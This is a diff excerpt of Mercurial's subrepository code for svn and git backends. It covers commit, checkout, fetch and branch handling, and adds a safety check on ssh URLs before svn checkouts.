1194 props = s[0].getAttribute('props')
1194 props = s[0].getAttribute('props')
1195 path = e.getAttribute('path')
1195 path = e.getAttribute('path')
1196 if item == 'external':
1196 if item == 'external':
1197 externals.append(path)
1197 externals.append(path)
1198 elif item == 'missing':
1198 elif item == 'missing':
1199 missing.append(path)
1199 missing.append(path)
1200 if (item not in ('', 'normal', 'unversioned', 'external')
1200 if (item not in ('', 'normal', 'unversioned', 'external')
1201 or props not in ('', 'none', 'normal')):
1201 or props not in ('', 'none', 'normal')):
1202 changes.append(path)
1202 changes.append(path)
1203 for path in changes:
1203 for path in changes:
1204 for ext in externals:
1204 for ext in externals:
1205 if path == ext or path.startswith(ext + pycompat.ossep):
1205 if path == ext or path.startswith(ext + pycompat.ossep):
1206 return True, True, bool(missing)
1206 return True, True, bool(missing)
1207 return bool(changes), False, bool(missing)
1207 return bool(changes), False, bool(missing)
1208
1208
1209 def dirty(self, ignoreupdate=False, missing=False):
1209 def dirty(self, ignoreupdate=False, missing=False):
1210 wcchanged = self._wcchanged()
1210 wcchanged = self._wcchanged()
1211 changed = wcchanged[0] or (missing and wcchanged[2])
1211 changed = wcchanged[0] or (missing and wcchanged[2])
1212 if not changed:
1212 if not changed:
1213 if self._state[1] in self._wcrevs() or ignoreupdate:
1213 if self._state[1] in self._wcrevs() or ignoreupdate:
1214 return False
1214 return False
1215 return True
1215 return True
1216
1216
1217 def basestate(self):
1217 def basestate(self):
1218 lastrev, rev = self._wcrevs()
1218 lastrev, rev = self._wcrevs()
1219 if lastrev != rev:
1219 if lastrev != rev:
1220 # Last committed rev is not the same than rev. We would
1220 # Last committed rev is not the same than rev. We would
1221 # like to take lastrev but we do not know if the subrepo
1221 # like to take lastrev but we do not know if the subrepo
1222 # URL exists at lastrev. Test it and fallback to rev it
1222 # URL exists at lastrev. Test it and fallback to rev it
1223 # is not there.
1223 # is not there.
1224 try:
1224 try:
1225 self._svncommand(['list', '%s@%s' % (self._state[0], lastrev)])
1225 self._svncommand(['list', '%s@%s' % (self._state[0], lastrev)])
1226 return lastrev
1226 return lastrev
1227 except error.Abort:
1227 except error.Abort:
1228 pass
1228 pass
1229 return rev
1229 return rev
1230
1230
1231 @annotatesubrepoerror
1231 @annotatesubrepoerror
1232 def commit(self, text, user, date):
1232 def commit(self, text, user, date):
1233 # user and date are out of our hands since svn is centralized
1233 # user and date are out of our hands since svn is centralized
1234 changed, extchanged, missing = self._wcchanged()
1234 changed, extchanged, missing = self._wcchanged()
1235 if not changed:
1235 if not changed:
1236 return self.basestate()
1236 return self.basestate()
1237 if extchanged:
1237 if extchanged:
1238 # Do not try to commit externals
1238 # Do not try to commit externals
1239 raise error.Abort(_('cannot commit svn externals'))
1239 raise error.Abort(_('cannot commit svn externals'))
1240 if missing:
1240 if missing:
1241 # svn can commit with missing entries but aborting like hg
1241 # svn can commit with missing entries but aborting like hg
1242 # seems a better approach.
1242 # seems a better approach.
1243 raise error.Abort(_('cannot commit missing svn entries'))
1243 raise error.Abort(_('cannot commit missing svn entries'))
1244 commitinfo, err = self._svncommand(['commit', '-m', text])
1244 commitinfo, err = self._svncommand(['commit', '-m', text])
1245 self.ui.status(commitinfo)
1245 self.ui.status(commitinfo)
1246 newrev = re.search('Committed revision ([0-9]+).', commitinfo)
1246 newrev = re.search('Committed revision ([0-9]+).', commitinfo)
1247 if not newrev:
1247 if not newrev:
1248 if not commitinfo.strip():
1248 if not commitinfo.strip():
1249 # Sometimes, our definition of "changed" differs from
1249 # Sometimes, our definition of "changed" differs from
1250 # svn one. For instance, svn ignores missing files
1250 # svn one. For instance, svn ignores missing files
1251 # when committing. If there are only missing files, no
1251 # when committing. If there are only missing files, no
1252 # commit is made, no output and no error code.
1252 # commit is made, no output and no error code.
1253 raise error.Abort(_('failed to commit svn changes'))
1253 raise error.Abort(_('failed to commit svn changes'))
1254 raise error.Abort(commitinfo.splitlines()[-1])
1254 raise error.Abort(commitinfo.splitlines()[-1])
1255 newrev = newrev.groups()[0]
1255 newrev = newrev.groups()[0]
1256 self.ui.status(self._svncommand(['update', '-r', newrev])[0])
1256 self.ui.status(self._svncommand(['update', '-r', newrev])[0])
1257 return newrev
1257 return newrev
1258
1258
1259 @annotatesubrepoerror
1259 @annotatesubrepoerror
1260 def remove(self):
1260 def remove(self):
1261 if self.dirty():
1261 if self.dirty():
1262 self.ui.warn(_('not removing repo %s because '
1262 self.ui.warn(_('not removing repo %s because '
1263 'it has changes.\n') % self._path)
1263 'it has changes.\n') % self._path)
1264 return
1264 return
1265 self.ui.note(_('removing subrepo %s\n') % self._path)
1265 self.ui.note(_('removing subrepo %s\n') % self._path)
1266
1266
1267 self.wvfs.rmtree(forcibly=True)
1267 self.wvfs.rmtree(forcibly=True)
1268 try:
1268 try:
1269 pwvfs = self._ctx.repo().wvfs
1269 pwvfs = self._ctx.repo().wvfs
1270 pwvfs.removedirs(pwvfs.dirname(self._path))
1270 pwvfs.removedirs(pwvfs.dirname(self._path))
1271 except OSError:
1271 except OSError:
1272 pass
1272 pass
1273
1273
1274 @annotatesubrepoerror
1274 @annotatesubrepoerror
1275 def get(self, state, overwrite=False):
1275 def get(self, state, overwrite=False):
1276 if overwrite:
1276 if overwrite:
1277 self._svncommand(['revert', '--recursive'])
1277 self._svncommand(['revert', '--recursive'])
1278 args = ['checkout']
1278 args = ['checkout']
1279 if self._svnversion >= (1, 5):
1279 if self._svnversion >= (1, 5):
1280 args.append('--force')
1280 args.append('--force')
1281 # The revision must be specified at the end of the URL to properly
1281 # The revision must be specified at the end of the URL to properly
1282 # update to a directory which has since been deleted and recreated.
1282 # update to a directory which has since been deleted and recreated.
1283 args.append('%s@%s' % (state[0], state[1]))
1283 args.append('%s@%s' % (state[0], state[1]))
1284
1285 # SEC: check that the ssh url is safe
1286 util.checksafessh(state[0])
1287
1284 status, err = self._svncommand(args, failok=True)
1288 status, err = self._svncommand(args, failok=True)
1285 _sanitize(self.ui, self.wvfs, '.svn')
1289 _sanitize(self.ui, self.wvfs, '.svn')
1286 if not re.search('Checked out revision [0-9]+.', status):
1290 if not re.search('Checked out revision [0-9]+.', status):
1287 if ('is already a working copy for a different URL' in err
1291 if ('is already a working copy for a different URL' in err
1288 and (self._wcchanged()[:2] == (False, False))):
1292 and (self._wcchanged()[:2] == (False, False))):
1289 # obstructed but clean working copy, so just blow it away.
1293 # obstructed but clean working copy, so just blow it away.
1290 self.remove()
1294 self.remove()
1291 self.get(state, overwrite=False)
1295 self.get(state, overwrite=False)
1292 return
1296 return
1293 raise error.Abort((status or err).splitlines()[-1])
1297 raise error.Abort((status or err).splitlines()[-1])
1294 self.ui.status(status)
1298 self.ui.status(status)
1295
1299
1296 @annotatesubrepoerror
1300 @annotatesubrepoerror
1297 def merge(self, state):
1301 def merge(self, state):
1298 old = self._state[1]
1302 old = self._state[1]
1299 new = state[1]
1303 new = state[1]
1300 wcrev = self._wcrev()
1304 wcrev = self._wcrev()
1301 if new != wcrev:
1305 if new != wcrev:
1302 dirty = old == wcrev or self._wcchanged()[0]
1306 dirty = old == wcrev or self._wcchanged()[0]
1303 if _updateprompt(self.ui, self, dirty, wcrev, new):
1307 if _updateprompt(self.ui, self, dirty, wcrev, new):
1304 self.get(state, False)
1308 self.get(state, False)
1305
1309
1306 def push(self, opts):
1310 def push(self, opts):
1307 # push is a no-op for SVN
1311 # push is a no-op for SVN
1308 return True
1312 return True
1309
1313
1310 @annotatesubrepoerror
1314 @annotatesubrepoerror
1311 def files(self):
1315 def files(self):
1312 output = self._svncommand(['list', '--recursive', '--xml'])[0]
1316 output = self._svncommand(['list', '--recursive', '--xml'])[0]
1313 doc = xml.dom.minidom.parseString(output)
1317 doc = xml.dom.minidom.parseString(output)
1314 paths = []
1318 paths = []
1315 for e in doc.getElementsByTagName('entry'):
1319 for e in doc.getElementsByTagName('entry'):
1316 kind = str(e.getAttribute('kind'))
1320 kind = str(e.getAttribute('kind'))
1317 if kind != 'file':
1321 if kind != 'file':
1318 continue
1322 continue
1319 name = ''.join(c.data for c
1323 name = ''.join(c.data for c
1320 in e.getElementsByTagName('name')[0].childNodes
1324 in e.getElementsByTagName('name')[0].childNodes
1321 if c.nodeType == c.TEXT_NODE)
1325 if c.nodeType == c.TEXT_NODE)
1322 paths.append(name.encode('utf-8'))
1326 paths.append(name.encode('utf-8'))
1323 return paths
1327 return paths
1324
1328
1325 def filedata(self, name, decode):
1329 def filedata(self, name, decode):
1326 return self._svncommand(['cat'], name)[0]
1330 return self._svncommand(['cat'], name)[0]
1327
1331
1328
1332
class gitsubrepo(abstractsubrepo):
    """Subrepository backed by a git checkout."""

    def __init__(self, ctx, path, state, allowcreate):
        super(gitsubrepo, self).__init__(ctx, path)
        self._state = state
        self._abspath = ctx.repo().wjoin(path)
        self._subparent = ctx.repo()
        # locate git and validate its version before doing anything else
        self._ensuregit()
1336
1340
1337 def _ensuregit(self):
1341 def _ensuregit(self):
1338 try:
1342 try:
1339 self._gitexecutable = 'git'
1343 self._gitexecutable = 'git'
1340 out, err = self._gitnodir(['--version'])
1344 out, err = self._gitnodir(['--version'])
1341 except OSError as e:
1345 except OSError as e:
1342 genericerror = _("error executing git for subrepo '%s': %s")
1346 genericerror = _("error executing git for subrepo '%s': %s")
1343 notfoundhint = _("check git is installed and in your PATH")
1347 notfoundhint = _("check git is installed and in your PATH")
1344 if e.errno != errno.ENOENT:
1348 if e.errno != errno.ENOENT:
1345 raise error.Abort(genericerror % (self._path, e.strerror))
1349 raise error.Abort(genericerror % (self._path, e.strerror))
1346 elif pycompat.osname == 'nt':
1350 elif pycompat.osname == 'nt':
1347 try:
1351 try:
1348 self._gitexecutable = 'git.cmd'
1352 self._gitexecutable = 'git.cmd'
1349 out, err = self._gitnodir(['--version'])
1353 out, err = self._gitnodir(['--version'])
1350 except OSError as e2:
1354 except OSError as e2:
1351 if e2.errno == errno.ENOENT:
1355 if e2.errno == errno.ENOENT:
1352 raise error.Abort(_("couldn't find 'git' or 'git.cmd'"
1356 raise error.Abort(_("couldn't find 'git' or 'git.cmd'"
1353 " for subrepo '%s'") % self._path,
1357 " for subrepo '%s'") % self._path,
1354 hint=notfoundhint)
1358 hint=notfoundhint)
1355 else:
1359 else:
1356 raise error.Abort(genericerror % (self._path,
1360 raise error.Abort(genericerror % (self._path,
1357 e2.strerror))
1361 e2.strerror))
1358 else:
1362 else:
1359 raise error.Abort(_("couldn't find git for subrepo '%s'")
1363 raise error.Abort(_("couldn't find git for subrepo '%s'")
1360 % self._path, hint=notfoundhint)
1364 % self._path, hint=notfoundhint)
1361 versionstatus = self._checkversion(out)
1365 versionstatus = self._checkversion(out)
1362 if versionstatus == 'unknown':
1366 if versionstatus == 'unknown':
1363 self.ui.warn(_('cannot retrieve git version\n'))
1367 self.ui.warn(_('cannot retrieve git version\n'))
1364 elif versionstatus == 'abort':
1368 elif versionstatus == 'abort':
1365 raise error.Abort(_('git subrepo requires at least 1.6.0 or later'))
1369 raise error.Abort(_('git subrepo requires at least 1.6.0 or later'))
1366 elif versionstatus == 'warning':
1370 elif versionstatus == 'warning':
1367 self.ui.warn(_('git subrepo requires at least 1.6.0 or later\n'))
1371 self.ui.warn(_('git subrepo requires at least 1.6.0 or later\n'))
1368
1372
1369 @staticmethod
1373 @staticmethod
1370 def _gitversion(out):
1374 def _gitversion(out):
1371 m = re.search(r'^git version (\d+)\.(\d+)\.(\d+)', out)
1375 m = re.search(r'^git version (\d+)\.(\d+)\.(\d+)', out)
1372 if m:
1376 if m:
1373 return (int(m.group(1)), int(m.group(2)), int(m.group(3)))
1377 return (int(m.group(1)), int(m.group(2)), int(m.group(3)))
1374
1378
1375 m = re.search(r'^git version (\d+)\.(\d+)', out)
1379 m = re.search(r'^git version (\d+)\.(\d+)', out)
1376 if m:
1380 if m:
1377 return (int(m.group(1)), int(m.group(2)), 0)
1381 return (int(m.group(1)), int(m.group(2)), 0)
1378
1382
1379 return -1
1383 return -1
1380
1384
1381 @staticmethod
1385 @staticmethod
1382 def _checkversion(out):
1386 def _checkversion(out):
1383 '''ensure git version is new enough
1387 '''ensure git version is new enough
1384
1388
1385 >>> _checkversion = gitsubrepo._checkversion
1389 >>> _checkversion = gitsubrepo._checkversion
1386 >>> _checkversion('git version 1.6.0')
1390 >>> _checkversion('git version 1.6.0')
1387 'ok'
1391 'ok'
1388 >>> _checkversion('git version 1.8.5')
1392 >>> _checkversion('git version 1.8.5')
1389 'ok'
1393 'ok'
1390 >>> _checkversion('git version 1.4.0')
1394 >>> _checkversion('git version 1.4.0')
1391 'abort'
1395 'abort'
1392 >>> _checkversion('git version 1.5.0')
1396 >>> _checkversion('git version 1.5.0')
1393 'warning'
1397 'warning'
1394 >>> _checkversion('git version 1.9-rc0')
1398 >>> _checkversion('git version 1.9-rc0')
1395 'ok'
1399 'ok'
1396 >>> _checkversion('git version 1.9.0.265.g81cdec2')
1400 >>> _checkversion('git version 1.9.0.265.g81cdec2')
1397 'ok'
1401 'ok'
1398 >>> _checkversion('git version 1.9.0.GIT')
1402 >>> _checkversion('git version 1.9.0.GIT')
1399 'ok'
1403 'ok'
1400 >>> _checkversion('git version 12345')
1404 >>> _checkversion('git version 12345')
1401 'unknown'
1405 'unknown'
1402 >>> _checkversion('no')
1406 >>> _checkversion('no')
1403 'unknown'
1407 'unknown'
1404 '''
1408 '''
1405 version = gitsubrepo._gitversion(out)
1409 version = gitsubrepo._gitversion(out)
1406 # git 1.4.0 can't work at all, but 1.5.X can in at least some cases,
1410 # git 1.4.0 can't work at all, but 1.5.X can in at least some cases,
1407 # despite the docstring comment. For now, error on 1.4.0, warn on
1411 # despite the docstring comment. For now, error on 1.4.0, warn on
1408 # 1.5.0 but attempt to continue.
1412 # 1.5.0 but attempt to continue.
1409 if version == -1:
1413 if version == -1:
1410 return 'unknown'
1414 return 'unknown'
1411 if version < (1, 5, 0):
1415 if version < (1, 5, 0):
1412 return 'abort'
1416 return 'abort'
1413 elif version < (1, 6, 0):
1417 elif version < (1, 6, 0):
1414 return 'warning'
1418 return 'warning'
1415 return 'ok'
1419 return 'ok'
1416
1420
1417 def _gitcommand(self, commands, env=None, stream=False):
1421 def _gitcommand(self, commands, env=None, stream=False):
1418 return self._gitdir(commands, env=env, stream=stream)[0]
1422 return self._gitdir(commands, env=env, stream=stream)[0]
1419
1423
1420 def _gitdir(self, commands, env=None, stream=False):
1424 def _gitdir(self, commands, env=None, stream=False):
1421 return self._gitnodir(commands, env=env, stream=stream,
1425 return self._gitnodir(commands, env=env, stream=stream,
1422 cwd=self._abspath)
1426 cwd=self._abspath)
1423
1427
1424 def _gitnodir(self, commands, env=None, stream=False, cwd=None):
1428 def _gitnodir(self, commands, env=None, stream=False, cwd=None):
1425 """Calls the git command
1429 """Calls the git command
1426
1430
1427 The methods tries to call the git command. versions prior to 1.6.0
1431 The methods tries to call the git command. versions prior to 1.6.0
1428 are not supported and very probably fail.
1432 are not supported and very probably fail.
1429 """
1433 """
1430 self.ui.debug('%s: git %s\n' % (self._relpath, ' '.join(commands)))
1434 self.ui.debug('%s: git %s\n' % (self._relpath, ' '.join(commands)))
1431 if env is None:
1435 if env is None:
1432 env = encoding.environ.copy()
1436 env = encoding.environ.copy()
1433 # disable localization for Git output (issue5176)
1437 # disable localization for Git output (issue5176)
1434 env['LC_ALL'] = 'C'
1438 env['LC_ALL'] = 'C'
1435 # fix for Git CVE-2015-7545
1439 # fix for Git CVE-2015-7545
1436 if 'GIT_ALLOW_PROTOCOL' not in env:
1440 if 'GIT_ALLOW_PROTOCOL' not in env:
1437 env['GIT_ALLOW_PROTOCOL'] = 'file:git:http:https:ssh'
1441 env['GIT_ALLOW_PROTOCOL'] = 'file:git:http:https:ssh'
1438 # unless ui.quiet is set, print git's stderr,
1442 # unless ui.quiet is set, print git's stderr,
1439 # which is mostly progress and useful info
1443 # which is mostly progress and useful info
1440 errpipe = None
1444 errpipe = None
1441 if self.ui.quiet:
1445 if self.ui.quiet:
1442 errpipe = open(os.devnull, 'w')
1446 errpipe = open(os.devnull, 'w')
1443 if self.ui._colormode and len(commands) and commands[0] == "diff":
1447 if self.ui._colormode and len(commands) and commands[0] == "diff":
1444 # insert the argument in the front,
1448 # insert the argument in the front,
1445 # the end of git diff arguments is used for paths
1449 # the end of git diff arguments is used for paths
1446 commands.insert(1, '--color')
1450 commands.insert(1, '--color')
1447 p = subprocess.Popen([self._gitexecutable] + commands, bufsize=-1,
1451 p = subprocess.Popen([self._gitexecutable] + commands, bufsize=-1,
1448 cwd=cwd, env=env, close_fds=util.closefds,
1452 cwd=cwd, env=env, close_fds=util.closefds,
1449 stdout=subprocess.PIPE, stderr=errpipe)
1453 stdout=subprocess.PIPE, stderr=errpipe)
1450 if stream:
1454 if stream:
1451 return p.stdout, None
1455 return p.stdout, None
1452
1456
1453 retdata = p.stdout.read().strip()
1457 retdata = p.stdout.read().strip()
1454 # wait for the child to exit to avoid race condition.
1458 # wait for the child to exit to avoid race condition.
1455 p.wait()
1459 p.wait()
1456
1460
1457 if p.returncode != 0 and p.returncode != 1:
1461 if p.returncode != 0 and p.returncode != 1:
1458 # there are certain error codes that are ok
1462 # there are certain error codes that are ok
1459 command = commands[0]
1463 command = commands[0]
1460 if command in ('cat-file', 'symbolic-ref'):
1464 if command in ('cat-file', 'symbolic-ref'):
1461 return retdata, p.returncode
1465 return retdata, p.returncode
1462 # for all others, abort
1466 # for all others, abort
1463 raise error.Abort(_('git %s error %d in %s') %
1467 raise error.Abort(_('git %s error %d in %s') %
1464 (command, p.returncode, self._relpath))
1468 (command, p.returncode, self._relpath))
1465
1469
1466 return retdata, p.returncode
1470 return retdata, p.returncode
1467
1471
1468 def _gitmissing(self):
1472 def _gitmissing(self):
1469 return not self.wvfs.exists('.git')
1473 return not self.wvfs.exists('.git')
1470
1474
1471 def _gitstate(self):
1475 def _gitstate(self):
1472 return self._gitcommand(['rev-parse', 'HEAD'])
1476 return self._gitcommand(['rev-parse', 'HEAD'])
1473
1477
1474 def _gitcurrentbranch(self):
1478 def _gitcurrentbranch(self):
1475 current, err = self._gitdir(['symbolic-ref', 'HEAD', '--quiet'])
1479 current, err = self._gitdir(['symbolic-ref', 'HEAD', '--quiet'])
1476 if err:
1480 if err:
1477 current = None
1481 current = None
1478 return current
1482 return current
1479
1483
1480 def _gitremote(self, remote):
1484 def _gitremote(self, remote):
1481 out = self._gitcommand(['remote', 'show', '-n', remote])
1485 out = self._gitcommand(['remote', 'show', '-n', remote])
1482 line = out.split('\n')[1]
1486 line = out.split('\n')[1]
1483 i = line.index('URL: ') + len('URL: ')
1487 i = line.index('URL: ') + len('URL: ')
1484 return line[i:]
1488 return line[i:]
1485
1489
1486 def _githavelocally(self, revision):
1490 def _githavelocally(self, revision):
1487 out, code = self._gitdir(['cat-file', '-e', revision])
1491 out, code = self._gitdir(['cat-file', '-e', revision])
1488 return code == 0
1492 return code == 0
1489
1493
1490 def _gitisancestor(self, r1, r2):
1494 def _gitisancestor(self, r1, r2):
1491 base = self._gitcommand(['merge-base', r1, r2])
1495 base = self._gitcommand(['merge-base', r1, r2])
1492 return base == r1
1496 return base == r1
1493
1497
1494 def _gitisbare(self):
1498 def _gitisbare(self):
1495 return self._gitcommand(['config', '--bool', 'core.bare']) == 'true'
1499 return self._gitcommand(['config', '--bool', 'core.bare']) == 'true'
1496
1500
1497 def _gitupdatestat(self):
1501 def _gitupdatestat(self):
1498 """This must be run before git diff-index.
1502 """This must be run before git diff-index.
1499 diff-index only looks at changes to file stat;
1503 diff-index only looks at changes to file stat;
1500 this command looks at file contents and updates the stat."""
1504 this command looks at file contents and updates the stat."""
1501 self._gitcommand(['update-index', '-q', '--refresh'])
1505 self._gitcommand(['update-index', '-q', '--refresh'])
1502
1506
1503 def _gitbranchmap(self):
1507 def _gitbranchmap(self):
1504 '''returns 2 things:
1508 '''returns 2 things:
1505 a map from git branch to revision
1509 a map from git branch to revision
1506 a map from revision to branches'''
1510 a map from revision to branches'''
1507 branch2rev = {}
1511 branch2rev = {}
1508 rev2branch = {}
1512 rev2branch = {}
1509
1513
1510 out = self._gitcommand(['for-each-ref', '--format',
1514 out = self._gitcommand(['for-each-ref', '--format',
1511 '%(objectname) %(refname)'])
1515 '%(objectname) %(refname)'])
1512 for line in out.split('\n'):
1516 for line in out.split('\n'):
1513 revision, ref = line.split(' ')
1517 revision, ref = line.split(' ')
1514 if (not ref.startswith('refs/heads/') and
1518 if (not ref.startswith('refs/heads/') and
1515 not ref.startswith('refs/remotes/')):
1519 not ref.startswith('refs/remotes/')):
1516 continue
1520 continue
1517 if ref.startswith('refs/remotes/') and ref.endswith('/HEAD'):
1521 if ref.startswith('refs/remotes/') and ref.endswith('/HEAD'):
1518 continue # ignore remote/HEAD redirects
1522 continue # ignore remote/HEAD redirects
1519 branch2rev[ref] = revision
1523 branch2rev[ref] = revision
1520 rev2branch.setdefault(revision, []).append(ref)
1524 rev2branch.setdefault(revision, []).append(ref)
1521 return branch2rev, rev2branch
1525 return branch2rev, rev2branch
1522
1526
1523 def _gittracking(self, branches):
1527 def _gittracking(self, branches):
1524 'return map of remote branch to local tracking branch'
1528 'return map of remote branch to local tracking branch'
1525 # assumes no more than one local tracking branch for each remote
1529 # assumes no more than one local tracking branch for each remote
1526 tracking = {}
1530 tracking = {}
1527 for b in branches:
1531 for b in branches:
1528 if b.startswith('refs/remotes/'):
1532 if b.startswith('refs/remotes/'):
1529 continue
1533 continue
1530 bname = b.split('/', 2)[2]
1534 bname = b.split('/', 2)[2]
1531 remote = self._gitcommand(['config', 'branch.%s.remote' % bname])
1535 remote = self._gitcommand(['config', 'branch.%s.remote' % bname])
1532 if remote:
1536 if remote:
1533 ref = self._gitcommand(['config', 'branch.%s.merge' % bname])
1537 ref = self._gitcommand(['config', 'branch.%s.merge' % bname])
1534 tracking['refs/remotes/%s/%s' %
1538 tracking['refs/remotes/%s/%s' %
1535 (remote, ref.split('/', 2)[2])] = b
1539 (remote, ref.split('/', 2)[2])] = b
1536 return tracking
1540 return tracking
1537
1541
1538 def _abssource(self, source):
1542 def _abssource(self, source):
1539 if '://' not in source:
1543 if '://' not in source:
1540 # recognize the scp syntax as an absolute source
1544 # recognize the scp syntax as an absolute source
1541 colon = source.find(':')
1545 colon = source.find(':')
1542 if colon != -1 and '/' not in source[:colon]:
1546 if colon != -1 and '/' not in source[:colon]:
1543 return source
1547 return source
1544 self._subsource = source
1548 self._subsource = source
1545 return _abssource(self)
1549 return _abssource(self)
1546
1550
1547 def _fetch(self, source, revision):
1551 def _fetch(self, source, revision):
1548 if self._gitmissing():
1552 if self._gitmissing():
1549 source = self._abssource(source)
1553 source = self._abssource(source)
1550 self.ui.status(_('cloning subrepo %s from %s\n') %
1554 self.ui.status(_('cloning subrepo %s from %s\n') %
1551 (self._relpath, source))
1555 (self._relpath, source))
1552 self._gitnodir(['clone', source, self._abspath])
1556 self._gitnodir(['clone', source, self._abspath])
1553 if self._githavelocally(revision):
1557 if self._githavelocally(revision):
1554 return
1558 return
1555 self.ui.status(_('pulling subrepo %s from %s\n') %
1559 self.ui.status(_('pulling subrepo %s from %s\n') %
1556 (self._relpath, self._gitremote('origin')))
1560 (self._relpath, self._gitremote('origin')))
1557 # try only origin: the originally cloned repo
1561 # try only origin: the originally cloned repo
1558 self._gitcommand(['fetch'])
1562 self._gitcommand(['fetch'])
1559 if not self._githavelocally(revision):
1563 if not self._githavelocally(revision):
1560 raise error.Abort(_('revision %s does not exist in subrepository '
1564 raise error.Abort(_('revision %s does not exist in subrepository '
1561 '"%s"\n') % (revision, self._relpath))
1565 '"%s"\n') % (revision, self._relpath))
1562
1566
1563 @annotatesubrepoerror
1567 @annotatesubrepoerror
1564 def dirty(self, ignoreupdate=False, missing=False):
1568 def dirty(self, ignoreupdate=False, missing=False):
1565 if self._gitmissing():
1569 if self._gitmissing():
1566 return self._state[1] != ''
1570 return self._state[1] != ''
1567 if self._gitisbare():
1571 if self._gitisbare():
1568 return True
1572 return True
1569 if not ignoreupdate and self._state[1] != self._gitstate():
1573 if not ignoreupdate and self._state[1] != self._gitstate():
1570 # different version checked out
1574 # different version checked out
1571 return True
1575 return True
1572 # check for staged changes or modified files; ignore untracked files
1576 # check for staged changes or modified files; ignore untracked files
1573 self._gitupdatestat()
1577 self._gitupdatestat()
1574 out, code = self._gitdir(['diff-index', '--quiet', 'HEAD'])
1578 out, code = self._gitdir(['diff-index', '--quiet', 'HEAD'])
1575 return code == 1
1579 return code == 1
1576
1580
1577 def basestate(self):
1581 def basestate(self):
1578 return self._gitstate()
1582 return self._gitstate()
1579
1583
1580 @annotatesubrepoerror
1584 @annotatesubrepoerror
1581 def get(self, state, overwrite=False):
1585 def get(self, state, overwrite=False):
1582 source, revision, kind = state
1586 source, revision, kind = state
1583 if not revision:
1587 if not revision:
1584 self.remove()
1588 self.remove()
1585 return
1589 return
1586 self._fetch(source, revision)
1590 self._fetch(source, revision)
1587 # if the repo was set to be bare, unbare it
1591 # if the repo was set to be bare, unbare it
1588 if self._gitisbare():
1592 if self._gitisbare():
1589 self._gitcommand(['config', 'core.bare', 'false'])
1593 self._gitcommand(['config', 'core.bare', 'false'])
1590 if self._gitstate() == revision:
1594 if self._gitstate() == revision:
1591 self._gitcommand(['reset', '--hard', 'HEAD'])
1595 self._gitcommand(['reset', '--hard', 'HEAD'])
1592 return
1596 return
1593 elif self._gitstate() == revision:
1597 elif self._gitstate() == revision:
1594 if overwrite:
1598 if overwrite:
1595 # first reset the index to unmark new files for commit, because
1599 # first reset the index to unmark new files for commit, because
1596 # reset --hard will otherwise throw away files added for commit,
1600 # reset --hard will otherwise throw away files added for commit,
1597 # not just unmark them.
1601 # not just unmark them.
1598 self._gitcommand(['reset', 'HEAD'])
1602 self._gitcommand(['reset', 'HEAD'])
1599 self._gitcommand(['reset', '--hard', 'HEAD'])
1603 self._gitcommand(['reset', '--hard', 'HEAD'])
1600 return
1604 return
1601 branch2rev, rev2branch = self._gitbranchmap()
1605 branch2rev, rev2branch = self._gitbranchmap()
1602
1606
1603 def checkout(args):
1607 def checkout(args):
1604 cmd = ['checkout']
1608 cmd = ['checkout']
1605 if overwrite:
1609 if overwrite:
1606 # first reset the index to unmark new files for commit, because
1610 # first reset the index to unmark new files for commit, because
1607 # the -f option will otherwise throw away files added for
1611 # the -f option will otherwise throw away files added for
1608 # commit, not just unmark them.
1612 # commit, not just unmark them.
1609 self._gitcommand(['reset', 'HEAD'])
1613 self._gitcommand(['reset', 'HEAD'])
1610 cmd.append('-f')
1614 cmd.append('-f')
1611 self._gitcommand(cmd + args)
1615 self._gitcommand(cmd + args)
1612 _sanitize(self.ui, self.wvfs, '.git')
1616 _sanitize(self.ui, self.wvfs, '.git')
1613
1617
1614 def rawcheckout():
1618 def rawcheckout():
1615 # no branch to checkout, check it out with no branch
1619 # no branch to checkout, check it out with no branch
1616 self.ui.warn(_('checking out detached HEAD in '
1620 self.ui.warn(_('checking out detached HEAD in '
1617 'subrepository "%s"\n') % self._relpath)
1621 'subrepository "%s"\n') % self._relpath)
1618 self.ui.warn(_('check out a git branch if you intend '
1622 self.ui.warn(_('check out a git branch if you intend '
1619 'to make changes\n'))
1623 'to make changes\n'))
1620 checkout(['-q', revision])
1624 checkout(['-q', revision])
1621
1625
1622 if revision not in rev2branch:
1626 if revision not in rev2branch:
1623 rawcheckout()
1627 rawcheckout()
1624 return
1628 return
1625 branches = rev2branch[revision]
1629 branches = rev2branch[revision]
1626 firstlocalbranch = None
1630 firstlocalbranch = None
1627 for b in branches:
1631 for b in branches:
1628 if b == 'refs/heads/master':
1632 if b == 'refs/heads/master':
1629 # master trumps all other branches
1633 # master trumps all other branches
1630 checkout(['refs/heads/master'])
1634 checkout(['refs/heads/master'])
1631 return
1635 return
1632 if not firstlocalbranch and not b.startswith('refs/remotes/'):
1636 if not firstlocalbranch and not b.startswith('refs/remotes/'):
1633 firstlocalbranch = b
1637 firstlocalbranch = b
1634 if firstlocalbranch:
1638 if firstlocalbranch:
1635 checkout([firstlocalbranch])
1639 checkout([firstlocalbranch])
1636 return
1640 return
1637
1641
1638 tracking = self._gittracking(branch2rev.keys())
1642 tracking = self._gittracking(branch2rev.keys())
1639 # choose a remote branch already tracked if possible
1643 # choose a remote branch already tracked if possible
1640 remote = branches[0]
1644 remote = branches[0]
1641 if remote not in tracking:
1645 if remote not in tracking:
1642 for b in branches:
1646 for b in branches:
1643 if b in tracking:
1647 if b in tracking:
1644 remote = b
1648 remote = b
1645 break
1649 break
1646
1650
1647 if remote not in tracking:
1651 if remote not in tracking:
1648 # create a new local tracking branch
1652 # create a new local tracking branch
1649 local = remote.split('/', 3)[3]
1653 local = remote.split('/', 3)[3]
1650 checkout(['-b', local, remote])
1654 checkout(['-b', local, remote])
1651 elif self._gitisancestor(branch2rev[tracking[remote]], remote):
1655 elif self._gitisancestor(branch2rev[tracking[remote]], remote):
1652 # When updating to a tracked remote branch,
1656 # When updating to a tracked remote branch,
1653 # if the local tracking branch is downstream of it,
1657 # if the local tracking branch is downstream of it,
1654 # a normal `git pull` would have performed a "fast-forward merge"
1658 # a normal `git pull` would have performed a "fast-forward merge"
1655 # which is equivalent to updating the local branch to the remote.
1659 # which is equivalent to updating the local branch to the remote.
1656 # Since we are only looking at branching at update, we need to
1660 # Since we are only looking at branching at update, we need to
1657 # detect this situation and perform this action lazily.
1661 # detect this situation and perform this action lazily.
1658 if tracking[remote] != self._gitcurrentbranch():
1662 if tracking[remote] != self._gitcurrentbranch():
1659 checkout([tracking[remote]])
1663 checkout([tracking[remote]])
1660 self._gitcommand(['merge', '--ff', remote])
1664 self._gitcommand(['merge', '--ff', remote])
1661 _sanitize(self.ui, self.wvfs, '.git')
